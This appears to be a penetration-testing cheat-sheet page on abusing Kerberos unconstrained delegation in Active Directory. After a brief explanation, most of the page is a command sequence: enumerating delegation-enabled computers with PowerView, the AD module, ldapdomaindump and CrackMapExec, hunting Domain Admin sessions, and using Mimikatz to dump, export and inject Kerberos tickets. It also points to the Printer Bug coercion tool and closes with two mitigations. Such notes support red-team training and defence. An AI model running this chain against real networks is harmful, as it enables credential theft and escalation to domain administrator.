search
GithubTwitter

Unconstrained Delegation

hashtag
General

  • When set for service account, allows delegation to any service to any resource on the domain as a user

  • When enabled, DC places user's TGT inside TGS when user requests access to service with unconstrained delegation enabled

  • Server extracts TGT from TGS and stores it in LSASS

  • Server can reuse the user's TGT to access resoruces

  • Escalate privileges when extracting TGT from Domain Admins or other HVTs

  • Note: need local admin access on the machine to extract tickets

hashtag
Exploitation

# Get computers that have unconstrained delegation enabled
# Using PowerView
Get-NetComputer -Unconstrained

# Using AD Module
Get-ADComputer -Filter { TrustedForDelegation -eq $true }
Get-ADUser -Filter { TrustedForDelegation -eq $true }

# ldapdomaindump
ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
grep TRUSTED_FOR_DELEGATION domain_computers.grep

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u username -p password --trusted-for-delegation

# Monitor DA logins on computer
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

# Check if we have local admin access on that machine using PowerView
Find-LocalAdminAccess -ComputerName dcorp-appsrv

# Get session on machine as local admin and check for tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

# Export tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Inject ticket into session
Invoke-Mimikatz -Command '"kerberos:ptt ticket.kirbi"'

hashtag
Printer Bug

  • Trick HVT to connect to machine with Unconstrained Delegation enabled

  • Force Domain Admin to connect to specific machine

  • https://github.com/leechristensen/SpoolSample

hashtag
Mitigation

  • Limit DA/Admin logins to specific servers

  • Set "Account is sensitive and cannot be delegated" for privileged accounts

hashtag
Further Reading

PreviousConstrained DelegationNextDNS Admins

Last updated